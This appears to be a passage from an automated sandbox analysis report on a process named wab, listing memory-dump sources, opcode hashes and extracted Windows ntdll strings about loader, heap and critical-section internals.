                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: ecf32446a44d0038ecf8069a9b55be127589fa71817f373babe650fbf388ef5b
                  • Instruction ID: 9689ffd7171026361a91ce8f47efc6d680f22e5160a9b63480394537f68c5487
                  • Opcode Fuzzy Hash: ecf32446a44d0038ecf8069a9b55be127589fa71817f373babe650fbf388ef5b
                  • Instruction Fuzzy Hash: FE90027120150402D14071584444796001547E0301F95C022A5164514E86598ED97665

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 228 22462f30-22462f3c LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 09a4b827ab53f88c20fc0b9fcb252c88d55546e5f816fe031f2bc959d031ae96
                  • Instruction ID: f71488d3b4c472b0e5b870da1e2649a5209ff608e8a8bfa5d98851397e266a79
                  • Opcode Fuzzy Hash: 09a4b827ab53f88c20fc0b9fcb252c88d55546e5f816fe031f2bc959d031ae96
                  • Instruction Fuzzy Hash: F690027134150442D10071584454B56001587F1301F95C026E1164514D8619CD567126
                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: b04ffc3b312a882452791ffb47daf90e5792eccdeef21290845de5c5217f3172
                  • Instruction ID: 8b875539e9b41e24f7b1b416875bca3a8897a7108bce936f511c49bc619f6582
                  • Opcode Fuzzy Hash: b04ffc3b312a882452791ffb47daf90e5792eccdeef21290845de5c5217f3172
                  • Instruction Fuzzy Hash: 8E900231211D0042D20075684C54B57001547E0303F95C126A0254514CC91589656521

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 229 22462f90-22462f9c LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 1bb6254223360dc11ae1ef3b9d48f74d20e61d1da106596c20e65b8df3801a57
                  • Instruction ID: d73d942607b7594a1f0d1aafe004f0168ee186c828005d4841c037dd57d46caa
                  • Opcode Fuzzy Hash: 1bb6254223360dc11ae1ef3b9d48f74d20e61d1da106596c20e65b8df3801a57
                  • Instruction Fuzzy Hash: 4C90023120190402D1007158485475B001547E0302F95C022A1264515D862589557571
                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: ec060cf1111c5b9cbd0638ed4914b763f6c480fb480e26c9c1241366e45d70ce
                  • Instruction ID: 4352a4de75f1f2829b1ea9c48a2c4e566c1f183a7bec8cd9aeb800caa822610e
                  • Opcode Fuzzy Hash: ec060cf1111c5b9cbd0638ed4914b763f6c480fb480e26c9c1241366e45d70ce
                  • Instruction Fuzzy Hash: 4F9002316015004241407168888495640156BF1211795C132A0A98510D855989696665

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 220 22462c70-22462c7c LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: b8a85c279c01289ebb0155cbeff407c935e9810f164ae40def5828c6789c4bc9
                  • Instruction ID: 0f3becbeaecf86b1925513ba75539e0d9898fe1ac224b37b2b9ae94dcdf332ae
                  • Opcode Fuzzy Hash: b8a85c279c01289ebb0155cbeff407c935e9810f164ae40def5828c6789c4bc9
                  • Instruction Fuzzy Hash: 0190023120158802D1107158844479A001547E0301F99C422A4524618D869589957121

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 221 22462ca0-22462cac LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 8d47de69c3d78d2769c2d1f787c89e98e9b320f475ba92ba4209bfdaaae34b09
                  • Instruction ID: 40d3991210ab3686d56f9019ec89bb93a6353497940d2c6e50bcecb269af9537
                  • Opcode Fuzzy Hash: 8d47de69c3d78d2769c2d1f787c89e98e9b320f475ba92ba4209bfdaaae34b09
                  • Instruction Fuzzy Hash: A490023120150402D10075985448696001547F0301F95D022A5124515EC66589957131

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 222 22462d10-22462d1c LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: c1957294020e16fe18a40023b2ed6b2e9c4a16427053c79b0060df5194c4512a
                  • Instruction ID: bbad43623c1e5f2fe8b2c3b4057d7fe7f2993ee2ceac4e7d8d36c53bbc51f4e9
                  • Opcode Fuzzy Hash: c1957294020e16fe18a40023b2ed6b2e9c4a16427053c79b0060df5194c4512a
                  • Instruction Fuzzy Hash: 2F90023921350002D1807158544865A001547E1202FD5D426A0115518CC915896D6321

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 223 22462d30-22462d3c LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: d0e4fc5e0263b51e6a27459c49f7d707839c5c55f39aeb7b202208d6bbdf68c5
                  • Instruction ID: bb748cbd3635bb7a28f8b531e6d2aa42b3d7c04507906d7b201d59a65ace46f1
                  • Opcode Fuzzy Hash: d0e4fc5e0263b51e6a27459c49f7d707839c5c55f39aeb7b202208d6bbdf68c5
                  • Instruction Fuzzy Hash: 9890023130150003D14071585458656401597F1301F95D022E0514514CD915895A6222

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 224 22462dd0-22462ddc LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: e886debaa7e458860a752bab67b577146be08096fc449b6d137fef6d378bf93b
                  • Instruction ID: 34d096d4410fd9914dc5c7ec9ee0d963abc2e1fd77d108c9fccb83b523e8ce20
                  • Opcode Fuzzy Hash: e886debaa7e458860a752bab67b577146be08096fc449b6d137fef6d378bf93b
                  • Instruction Fuzzy Hash: CA900231242541525545B1584444557401657F02417D5C023A1514910C8526995AE621

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 225 22462df0-22462dfc LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 5c5e69a174d0e326c0a3ee7237d384db562f2a9830bcd590d4dd9465ef02c5e6
                  • Instruction ID: 1ab374116a22aa9ac49a71867383475e87aab9025a8892013a87616605c6305e
                  • Opcode Fuzzy Hash: 5c5e69a174d0e326c0a3ee7237d384db562f2a9830bcd590d4dd9465ef02c5e6
                  • Instruction Fuzzy Hash: 5E90023120150413D11171584544757001947E0241FD5C423A0524518D96568A56B121
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-2160512332
                  • Opcode ID: 9bc3ea170fc8e0a6d81174f57e699c5e435f73d30b4d57a2ec6a4a49d1da6ac9
                  • Instruction ID: 75247c589792eec546ea89eecc7b82bf06fa9ffaf0686b2a3d532c68e6c0e46e
                  • Opcode Fuzzy Hash: 9bc3ea170fc8e0a6d81174f57e699c5e435f73d30b4d57a2ec6a4a49d1da6ac9
                  • Instruction Fuzzy Hash: B8928E71608341AFE321CF24C9A0F5BB7E8BBA4B58F10492DFA94DB251D7B0D944DB92
                  Strings
                  • Address of the debug info found in the active list., xrefs: 224954AE, 224954FA
                  • Critical section address, xrefs: 22495425, 224954BC, 22495534
                  • double initialized or corrupted critical section, xrefs: 22495508
                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 224954E2
                  • Thread is in a state in which it cannot own a critical section, xrefs: 22495543
                  • Critical section debug info address, xrefs: 2249541F, 2249552E
                  • Thread identifier, xrefs: 2249553A
                  • corrupted critical section, xrefs: 224954C2
                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2249540A, 22495496, 22495519
                  • 8, xrefs: 224952E3
                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 224954CE
                  • undeleted critical section in freed memory, xrefs: 2249542B
                  • Invalid debug info address of this critical section, xrefs: 224954B6
                  • Critical section address., xrefs: 22495502
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                  • API String ID: 0-2368682639
                  • Opcode ID: c3752efb05dba9bfb6660b1973cc896e868a7077c8b50a4fae588856dc7a9ea8
                  • Instruction ID: 6232f1476f8799cbfe22597d4c11a6b689c9d1287575507493d0a9232cb577da
                  • Opcode Fuzzy Hash: c3752efb05dba9bfb6660b1973cc896e868a7077c8b50a4fae588856dc7a9ea8
                  • Instruction Fuzzy Hash: 76819CB1A00358EFEB14CF94CA84FAEBBF5BB48715F604129F904B7241D775AA81CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/D"$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                  • API String ID: 0-397910326
                  • Opcode ID: 07fd7a61fbb9529008abadaee7e68028d4b46a5509c2a84c48d8bfa8455dca44
                  • Instruction ID: 81125a7031652b31b028c5947cf9ac7bfef84888b18d6e11f409d5f3c3afa577
                  • Opcode Fuzzy Hash: 07fd7a61fbb9529008abadaee7e68028d4b46a5509c2a84c48d8bfa8455dca44
                  • Instruction Fuzzy Hash: 5AB16BB2908355DFC715CF24C980B5BBBE8AB88B58F01492EF998D7340D774DA49CB92
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                  • API String ID: 0-3591852110
                  • Opcode ID: ebbec1adf40ade704eb535a06623b877c245e10267d6f9435ea8a4ee3e250693
                  • Instruction ID: 0f0b5328100fd65774f366dcfc52fac58fffbf083aac83758ba040a6e217b817
                  • Opcode Fuzzy Hash: ebbec1adf40ade704eb535a06623b877c245e10267d6f9435ea8a4ee3e250693
                  • Instruction Fuzzy Hash: 1C12AE36600742EFD715CF68C5A0BAABBF1FF0D718F148559E88A8B662D734E981CB50
                  Strings
                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 2241D0CF
                  • @, xrefs: 2241D313
                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 2241D2C3
                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 2241D196
                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 2241D146
                  • H/D", xrefs: 2247A843
                  • @, xrefs: 2241D0FD
                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 2241D262
                  • @, xrefs: 2241D2AF
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/D"$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                  • API String ID: 0-3880053010
                  • Opcode ID: f08768bc38e089ff96b79f2119de84ac7d5deef768c6cd842fb06a28654743ad
                  • Instruction ID: 6601684fc00042e994f116b19294445db7f40687e694f50ef4a2fd39b060874a
                  • Opcode Fuzzy Hash: f08768bc38e089ff96b79f2119de84ac7d5deef768c6cd842fb06a28654743ad
                  • Instruction Fuzzy Hash: 6CA16EB1908355DFD311CF21C980B9BB7E8BB88B59F00492EFA9896241D774DA48CF93
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                  • API String ID: 2994545307-3063724069
                  • Opcode ID: 218f703d8cbdd3f970eb2688477c99913f35d41d989624f037b31fbd08bee7bf
                  • Instruction ID: b8aa941b86dea214dac3744d3c2b28ae01cd11bf0d0a2b049f4ae51ece0f1912
                  • Opcode Fuzzy Hash: 218f703d8cbdd3f970eb2688477c99913f35d41d989624f037b31fbd08bee7bf
                  • Instruction Fuzzy Hash: A9D1B472C09355ABD731CB64C880FAB7BE8AF94B58F004A2DFA54A7250D774C944CBA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                  • API String ID: 0-1700792311
                  • Opcode ID: 9a5b420c3aef9f581e18ad1a7b64e801596317ae9bb7ab0d67d322a402f27170
                  • Instruction ID: c36a2eea16f1c47cc057ae8f391bf0c8d239593b145c02cceb1f0194065bff5d
                  • Opcode Fuzzy Hash: 9a5b420c3aef9f581e18ad1a7b64e801596317ae9bb7ab0d67d322a402f27170
                  • Instruction Fuzzy Hash: E2D1EC36610785EFCB12CF68C560AADBBF1FF5AB18F049559E8459B352C734E982CB10
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                  • API String ID: 0-523794902
                  • Opcode ID: 149209d7c137e1bdcc3c83936e92a2c57cda28d17c24909cb2232858ea7a881b
                  • Instruction ID: a7f4400d4bad1da0533a0cdf63db0510ac07a692d8ea521a9e929f3223c0eb20
                  • Opcode Fuzzy Hash: 149209d7c137e1bdcc3c83936e92a2c57cda28d17c24909cb2232858ea7a881b
                  • Instruction Fuzzy Hash: 0442DD312187819FD315CF28C980B5ABBE5FF98708F154A6DE895CB352DB34E982CB52
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: H/D"$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                  • API String ID: 0-2190263626
                  • Opcode ID: 7448413c820f8caeb9403a1aaae3f1bca03609d25c76614ab493a69566017614
                  • Instruction ID: e65299318858e3bed187319c558e0d980ec142a6e2c074569601b804115faeee
                  • Opcode Fuzzy Hash: 7448413c820f8caeb9403a1aaae3f1bca03609d25c76614ab493a69566017614
                  • Instruction Fuzzy Hash: B5F13A72D11718EFDB12CF94C980EAEBBB9BF58B54F51406AE501EB210DB749E41CB90
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                  • API String ID: 0-122214566
                  • Opcode ID: 230159fea03ad7b8a36d81d8506747493e5134421c2702a3bcf3606e6df00cc9
                  • Instruction ID: 6ea29edbfd14d52e8473359225db2633badf393ee6456bfc3a3a2bbf9cf0f103
                  • Opcode Fuzzy Hash: 230159fea03ad7b8a36d81d8506747493e5134421c2702a3bcf3606e6df00cc9
                  • Instruction Fuzzy Hash: A0C16B31A00319ABDB169F64CC80BBEB7A5BF59714F208269E905DF391EBB4CD85C391
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-792281065
                  • Opcode ID: 21820317fb2e440f370ca004b5208f1ce368b6081f1548f52e6822bcd295d2b9
                  • Instruction ID: 4b34eddb3e0e412ea857b1097c82f6a68ed9dff4ade675fae3ea81cf58d1814d
                  • Opcode Fuzzy Hash: 21820317fb2e440f370ca004b5208f1ce368b6081f1548f52e6822bcd295d2b9
